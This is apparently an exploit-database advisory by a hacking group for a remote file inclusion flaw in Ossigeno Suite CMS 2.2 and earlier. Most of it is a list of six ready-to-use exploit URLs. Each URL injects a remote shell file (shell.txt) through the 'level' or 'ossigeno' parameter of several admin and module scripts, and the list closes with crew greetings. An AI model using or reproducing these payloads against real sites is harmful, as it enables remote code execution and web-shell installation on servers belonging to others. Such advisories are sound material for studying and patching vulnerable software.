Ossigeno Suite CMS versions 2.2 and below suffer from remote file inclusion vulnerabilities.
cd3a5fd83140abce7c288c2c60a9cee0fb1afe1cda596e4ce6c9e0a8c6964c74
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ Ossigeno Suite CMS 2.2 RFI ~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------
Author : ShAy6oOoN
---------------------
Group : PitBull Crew
---------------------
Script : Ossigeno Suite CMS 2.2
---------------------
Download : http://downloads.sourceforge.net/ossigeno/ossigeno-suite-2.2_pre1.tar.gz?modtime=1196337401&big_mirror=0
---------------------
Vulnerability Type : Remote File Inclusion
---------------------
Method : get
---------------------
Register_globals : On
---------------------
Exploit URL's :
---------------------
http://localhost/ossigeno-suite-2.2_pre1/upload/xax/admin/modules/install_module.php?level=http://localhost/shell.txt?
http://localhost/ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=http://localhost/shell.txt?
http://localhost/ossigeno-suite-2.2_pre1/upload/xax/admin/patch/index.php?level=http://localhost/shell.txt?
http://localhost/ossigeno-suite-2.2_pre1/upload/xax/ossigeno/admin/install_module.php?level=http://localhost/shell.txt?
http://localhost/ossigeno-suite-2.2_pre1/upload/xax/ossigeno/admin/uninstall_module.php?level=http://localhost/shell.txt?
http://localhost/ossigeno-suite-2.2_pre1/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=http://localhost/shell.txt?
Greetings:
----------
PitBull Crew : The_PitBull - iNs - c0ol - Raz0r
Thanks To:
----------
str0ke